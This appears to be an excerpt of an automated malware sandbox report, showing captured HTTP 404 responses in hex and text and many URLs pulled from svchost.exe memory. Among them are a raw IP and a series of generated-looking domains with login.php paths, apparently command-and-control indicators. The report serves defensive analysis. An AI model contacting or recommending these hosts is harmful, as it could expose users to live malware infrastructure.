2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:14:53 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:14:53 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:15:01 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: svchost.exe, 00000002.00000003.2434703123.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2471230850.0000000005801000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2433894969.00000000087AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://106.15.232.163:8000/dh/147287063_134827.html#index8?d=lyrysor.com
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gacycus.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2354372156.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gacydes.com/login.php
Source: svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302611741.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296551987.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296876973.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303296410.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2297408732.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301364243.00000000033EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gacyfew.com/login.php
Source: svchost.exe, 00000002.00000003.2709443016.00000000033AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2673206249.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671925473.00000000033AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gacyfih.com/P
Source: svchost.exe, 00000002.00000003.2672088553.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738837414.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671484952.00000000086F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gacyfih.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2799115351.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384269083.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2802098474.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gacyhuw.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2607736058.0000000008786000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334859023.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2628718282.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635696281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336766554.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638579923.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604615321.0000000008783000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gacykub.com/login.php
Source: svchost.exe, 00000002.00000003.2337642053.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338991462.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339128784.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338382961.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339275288.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635676013.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338959183.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635826907.00000000086F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gacynow.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3283281392.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393602354.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2800821291.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404003407.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384104652.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gacynyh.com/login.php
Source: svchost.exe, 00000002.00000003.2370194718.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2368250212.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2753175286.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748730470.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2747671428.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752865604.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2368486690.0000000003353000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gacypiw.com/login.php
Source: svchost.exe, 00000002.00000003.2318282054.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321460609.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577742596.0000000008692000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321367524.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321434222.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2768400966.0000000008705000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gacypyz.com/login.php
Source: svchost.exe, 00000002.00000003.2194039895.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393602354.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202332641.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gacyqob.com/login.php
Source: svchost.exe, 00000002.00000003.2763334143.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403450959.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3265760525.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2787365873.00000000086F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gacyvah.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2799131678.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3255347257.0000000003399000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384104652.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gadycih.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330154891.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329628428.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330446877.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329845056.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gadyfob.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gadyhyw.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307697997.0000000003394000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301364243.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gadykos.com/login.php
